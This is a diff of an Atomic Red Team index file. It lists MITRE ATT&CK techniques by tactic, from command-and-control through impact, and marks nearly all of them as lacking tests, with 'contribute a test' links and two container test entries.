-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# command-and-control
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.003 Proxy: Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1571 Non-Standard Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.001 Proxy: Internal Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# collection
+- T1560.001 Archive Collected Data: Archive via Utility [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1113 Screen Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.001 Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
+- T1021.005 Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# credential-access
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.003 Credentials from Password Stores: Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.004 Unsecured Credentials: Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# discovery
+- T1033 System Owner/User Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.001 System Network Configuration Discovery: Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.001 Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1135 Network Share Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1217 Browser Bookmark Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016 System Network Configuration Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1083 File and Directory Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1057 Process Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
+ - Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1018 Remote System Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1046 Network Service Discovery](../../T1046/T1046.md)
+ - Atomic Test #9: Network Service Discovery for Containers [containers]
+- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1124 System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
+- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
